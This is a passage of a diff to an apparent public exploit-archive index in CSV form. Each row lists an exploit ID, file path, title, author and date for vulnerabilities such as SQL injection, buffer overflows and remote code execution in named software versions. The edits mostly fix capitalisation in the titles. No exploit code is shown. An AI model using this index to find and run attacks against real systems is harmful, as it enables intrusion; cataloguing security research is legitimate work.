Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24874,platforms/multiple/remote/24874.rb,"Apache Struts - ParametersInterceptor Remote Code Execution",2013-03-22,Metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow",2013-03-22,Metasploit,windows,remote,0 -24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 - (filemanager.php) Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 +24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 - (FileManager.php) Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQL Injections",2013-03-25,"Saadi Siddiqui",php,webapps,0 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow",2013-03-25,G0li47h,windows,dos,0 -24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - (gmembers.php gid parameter) Blind SQL Injection",2013-03-25,Esac,php,webapps,0 +24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - (gmembers.php gid Parameter) Blind SQL Injection",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation",2013-03-25,Dr_IDE,windows,local,0 @@ -22041,11 +22042,11 @@ id,file,description,date,author,platform,type,port 24888,platforms/linux/remote/24888.rb,"Mutiny - Remote Command Execution",2013-03-25,Metasploit,linux,remote,0 24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center - Arbitrary File Upload",2013-03-26,Metasploit,windows,remote,0 24892,platforms/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",hardware,remote,0 -24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - (awards.php id parameter) Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 +24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - (awards.php id Parameter) Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0 24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow SEH",2013-03-29,"Myo Soe",windows,remote,0 -24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid parameter' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 +24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid Parameter' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution",2013-04-12,Metasploit,linux,remote,5666 @@ -22055,13 +22056,13 @@ id,file,description,date,author,platform,type,port 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell - Remote Code Execution",2013-03-29,Metasploit,php,remote,0 24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution",2013-03-29,Metasploit,windows,remote,0 24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution",2013-03-29,Metasploit,multiple,remote,0 -24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php what parameter) Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 +24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php what Parameter) Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 - Denial of Service",2013-04-05,npn,windows,dos,0 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 -24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - (index.php p parameter) Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 +24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - (index.php p Parameter) Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 -24914,platforms/php/webapps/24914.txt,"Wordpress FuneralPress Plugin 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 +24914,platforms/php/webapps/24914.txt,"WordPress FuneralPress Plugin 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0 24919,platforms/windows/local/24919.py,"HexChat 2.9.4 - Local Exploit",2013-04-07,"Matt Andreko",windows,local,0 @@ -22076,7 +22077,7 @@ id,file,description,date,author,platform,type,port 24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B - setup.cgi Remote Command Execution",2013-04-08,Metasploit,hardware,remote,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 -24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 - (grouppay.php hash parameter) SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 +24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 - (grouppay.php hash Parameter) SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution",2013-04-08,Metasploit,linux,remote,0 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection",2013-04-08,Metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution",2013-04-08,Metasploit,linux,remote,0 @@ -22089,7 +22090,7 @@ id,file,description,date,author,platform,type,port 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps,0 643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0 -24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 +24944,platforms/windows/remote/24944.py,"Freefloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution",2013-04-10,Metasploit,hardware,remote,0 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,Metasploit,multiple,remote,0 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0 @@ -22101,7 +22102,7 @@ id,file,description,date,author,platform,type,port 24953,platforms/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",php,webapps,0 24954,platforms/php/webapps/24954.txt,"Simple HRM System 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 24956,platforms/hardware/remote/24956.rb,"DLink DIR-645 - / DIR-815 diagnostic.php Command Execution",2013-04-12,Metasploit,hardware,remote,0 -24958,platforms/windows/remote/24958.py,"MinaliC Webserver 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0 +24958,platforms/windows/remote/24958.py,"MinaliC WebServer 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0 24959,platforms/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,php,webapps,0 24960,platforms/php/webapps/24960.txt,"phpVms Virtual Airline Administration 2.1.934 & 2.1.935 - SQL Injection",2013-04-15,NoGe,php,webapps,0 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0 @@ -22110,7 +22111,7 @@ id,file,description,date,author,platform,type,port 24964,platforms/windows/webapps/24964.txt,"Oracle WebCenter Sites Satellite Server - HTTP Header Injection",2013-04-18,"SEC Consult",windows,webapps,0 24965,platforms/php/webapps/24965.txt,"KrisonAV CMS 3.0.1 - Multiple Vulnerabilities",2013-04-18,"High-Tech Bridge SA",php,webapps,0 24966,platforms/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",windows,dos,0 -24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0 +24967,platforms/multiple/webapps/24967.txt,"Nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0 25090,platforms/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",php,webapps,0 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Inclusion",2005-06-10,Status-x,php,webapps,0 @@ -22129,14 +22130,14 @@ id,file,description,date,author,platform,type,port 24983,platforms/multiple/remote/24983.txt,"Vilistextum 2.6.6 - HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24985,platforms/php/remote/24985.txt,"PHP 4/5 - addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 -24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0 +24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 -24988,platforms/php/webapps/24988.txt,"Wordpress 1.2.1/1.2.2 - /wp-admin/post.php content Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24989,platforms/php/webapps/24989.txt,"Wordpress 1.2.1/1.2.2 - /wp-admin/templates.php file Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24990,platforms/php/webapps/24990.txt,"Wordpress 1.2.1/1.2.2 - link-add.php Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24991,platforms/php/webapps/24991.txt,"Wordpress 1.2.1/1.2.2 - link-categories.php cat_id Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24992,platforms/php/webapps/24992.txt,"Wordpress 1.2.1/1.2.2 - link-manager.php Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24993,platforms/php/webapps/24993.txt,"Wordpress 1.2.1/1.2.2 - moderation.php item_approved Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/post.php content Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - /wp-admin/templates.php file Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 - link-add.php Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 - link-categories.php cat_id Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24992,platforms/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 - link-manager.php Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - moderation.php item_approved Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",multiple,remote,0 24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet - Remote Unauthenticated Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",windows,remote,0 @@ -22152,8 +22153,8 @@ id,file,description,date,author,platform,type,port 25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0 29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 -29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0 -24999,platforms/windows/remote/24999.py,"Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 +29278,platforms/php/webapps/29278.pl,"Work System eCommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0 +24999,platforms/windows/remote/24999.py,"Microsoft Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free",2013-05-07,Metasploit,windows,remote,0 25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection",2013-04-25,Metasploit,linux,remote,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps,0 @@ -22163,20 +22164,20 @@ id,file,description,date,author,platform,type,port 25006,platforms/linux/remote/25006.txt,"RTF2LATEX2E 1.0 - Stack Buffer Overflow",2004-12-16,"Limin Wang",linux,remote,0 25007,platforms/windows/dos/25007.txt,"Convex 3D 0.8 - Buffer Overflow",2004-12-16,"Ariel Berkman",windows,dos,0 25008,platforms/linux/remote/25008.txt,"LinPopUp 1.2 - Remote Buffer Overflow",2004-12-15,"Stephen Dranger",linux,remote,0 -25009,platforms/windows/remote/25009.txt,"Gadu-Gadu 6.0 - URL Parser Javascript Cross-Site Scripting",2004-12-17,"Jaroslaw Sajko",windows,remote,0 +25009,platforms/windows/remote/25009.txt,"Gadu-Gadu 6.0 - URL Parser JavaScript Cross-Site Scripting",2004-12-17,"Jaroslaw Sajko",windows,remote,0 25010,platforms/linux/remote/25010.txt,"O3Read 0.0.3 - HTML Parser Buffer Overflow",2004-12-17,"Wiktor Kopec",linux,remote,0 25011,platforms/multiple/remote/25011.txt,"HTML2HDML 1.0.3 - File Conversion Buffer Overflow",2004-12-15,"Matthew Dabrowski",multiple,remote,0 25012,platforms/windows/dos/25012.c,"Easy Software Products LPPassWd 1.1.22 - Resource Limit Denial of Service",2004-12-11,"Bartlomiej Sieka",windows,dos,0 -25013,platforms/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 - Arbitrary application execution",2004-12-17,"amoXi & Dr.vaXin",windows,remote,0 +25013,platforms/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 - Arbitrary Application Execution",2004-12-17,"amoXi & Dr.vaXin",windows,remote,0 25014,platforms/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,php,webapps,0 -25015,platforms/linux/remote/25015.txt,"Michael Kohn Ringtone Tools 2.22 - .EMelody File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",linux,remote,0 +25015,platforms/linux/remote/25015.txt,"Michael Kohn Ringtone Tools 2.22 - '.EMelody' File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",linux,remote,0 25016,platforms/windows/remote/25016.txt,"ASP2PHP 0.76.23 - Preparse Token Variable Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote,0 25017,platforms/linux/dos/25017.txt,"UML_Utilities User-Mode Linux - uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service",2004-12-15,"Danny Lungstrom",linux,dos,0 25018,platforms/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote,0 25019,platforms/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",multiple,remote,0 -25020,platforms/windows/remote/25020.txt,"Michael Kohn VB2C 0.02 - .FRM File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote,0 +25020,platforms/windows/remote/25020.txt,"Michael Kohn VB2C 0.02 - '.FRM' File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote,0 25021,platforms/windows/remote/25021.txt,"ABCPP 1.3 - Directive Handler Buffer Overflow",2004-12-15,"Yosef Klein",windows,remote,0 -25022,platforms/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 - .ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 +25022,platforms/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 - '.ABC' File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 25023,platforms/windows/remote/25023.txt,"PGN2WEB 0.3 - Buffer Overflow",2004-12-15,"Tom Palarz",windows,remote,0 25183,platforms/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 25024,platforms/hardware/webapps/25024.txt,"D-Link DIR-635 - Multiple Vulnerabilities",2013-04-26,m-1-k-3,hardware,webapps,0 @@ -22186,10 +22187,10 @@ id,file,description,date,author,platform,type,port 25028,platforms/multiple/remote/25028.txt,"CSV2XML 0.5.1 - Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote,0 25029,platforms/windows/remote/25029.txt,"abctab2ps 1.6.3 - Trim_Title Function ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 25030,platforms/linux/remote/25030.txt,"GNU UnRTF 0.19.3 - Font Table Conversion Buffer Overflow",2004-12-15,"Yosef Klein",linux,remote,0 -25031,platforms/windows/remote/25031.html,"Windows Media Player 9.0 - ActiveX Control Media File Attribute Corruption",2004-12-18,"Arman Nayyeri",windows,remote,0 -25032,platforms/windows/remote/25032.html,"Windows Media Player 9.0 - ActiveX Control File Enumeration",2004-12-18,"Arman Nayyeri",windows,remote,0 -25033,platforms/windows/remote/25033.txt,"GREED 0.81 - .GRX File List Buffer Overflow",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 -25034,platforms/windows/remote/25034.txt,"GREED 0.81 - .GRX File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 +25031,platforms/windows/remote/25031.html,"Microsoft Windows Media Player 9.0 - ActiveX Control Media File Attribute Corruption",2004-12-18,"Arman Nayyeri",windows,remote,0 +25032,platforms/windows/remote/25032.html,"Microsoft Windows Media Player 9.0 - ActiveX Control File Enumeration",2004-12-18,"Arman Nayyeri",windows,remote,0 +25033,platforms/windows/remote/25033.txt,"GREED 0.81 - '.GRX' File List Buffer Overflow",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 +25034,platforms/windows/remote/25034.txt,"GREED 0.81 - '.GRX' File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 25035,platforms/linux/remote/25035.txt,"PCAL 4.x - Calendar File getline Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 25036,platforms/linux/remote/25036.txt,"PCAL 4.x - Calendar File get_holiday Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 25037,platforms/php/webapps/25037.txt,"Kayako eSupport 2.x - 'index.php' Knowledgebase Cross-Site Scripting",2004-12-18,"James Bercegay",php,webapps,0 @@ -22198,8 +22199,8 @@ id,file,description,date,author,platform,type,port 25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0 25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0 -25043,platforms/php/webapps/25043.txt,"PHPGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0 -25044,platforms/php/webapps/25044.txt,"PHPGroupWare 0.9.x - 'index.php' HTML Injection",2004-01-27,"Cedric Cochin",php,webapps,0 +25043,platforms/php/webapps/25043.txt,"phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0 +25044,platforms/php/webapps/25044.txt,"phpGroupWare 0.9.x - 'index.php' HTML Injection",2004-01-27,"Cedric Cochin",php,webapps,0 25045,platforms/php/webapps/25045.txt,"2BGal 2.5.1 - SQL Injection",2004-12-22,zib,php,webapps,0 25046,platforms/linux/dos/25046.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (1)",2004-12-22,"Marcin Zgorecki",linux,dos,0 25047,platforms/linux/dos/25047.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (2)",2004-12-22,Antimatt3r,linux,dos,0 @@ -22212,15 +22213,15 @@ id,file,description,date,author,platform,type,port 25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,osx,local,0 25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 - Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",multiple,dos,0 -25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 - .Skin File Directory Traversal",2005-01-21,"Luigi Auriemma",windows,remote,0 +25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 - '.Skin' File Directory Traversal",2005-01-21,"Luigi Auriemma",windows,remote,0 25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0 25059,platforms/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps,0 25060,platforms/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps,0 25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant IN_CDDA.dll Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0 25062,platforms/php/webapps/25062.txt,"Comdev eCommerce 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps,0 25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,windows,dos,0 -25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 - (Build 1112) download.php Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 -25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 - (Build 1112) upload.php Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 +25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) - 'download.php' Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 +25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) - 'upload.php' Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 25066,platforms/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",multiple,remote,0 25067,platforms/cgi/webapps/25067.txt,"alt-n WebAdmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html username Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 @@ -22231,7 +22232,7 @@ id,file,description,date,author,platform,type,port 25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 - product.php Cross-Site Scripting",2005-01-31,SmOk3,php,webapps,0 25074,platforms/php/webapps/25074.txt,"XOOPS Module module 3.0 - Directory Traversal",2005-01-28,Lostmon,php,webapps,0 25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",multiple,dos,0 -25076,platforms/linux/dos/25076.c,"postgresql 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 +25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0 25078,platforms/asp/webapps/25078.txt,"Eurofull E-Commerce - Mensresp.asp Cross-Site Scripting",2005-02-02,Yani-ari,asp,webapps,0 25079,platforms/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 - CD-Key Hash Remote Buffer Overflow",2005-02-02,"Luigi Auriemma",multiple,remote,0 @@ -22239,14 +22240,14 @@ id,file,description,date,author,platform,type,port 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0 25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0 -25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 - Web Access Login Form Remote URI Redirection",2005-02-07,"Morning Wood",asp,webapps,0 +25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 - Web Access Login Form Remote URI redirection",2005-02-07,"Morning Wood",asp,webapps,0 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 25086,platforms/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - Cross-Site Scripting",2013-04-29,DaOne,windows,webapps,0 25087,platforms/php/webapps/25087.txt,"Joomla! 3.0.3 - (remember.php) PHP Object Injection",2013-04-26,EgiX,php,webapps,0 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload",2005-02-08,"Tan Chew Keong",windows,remote,0 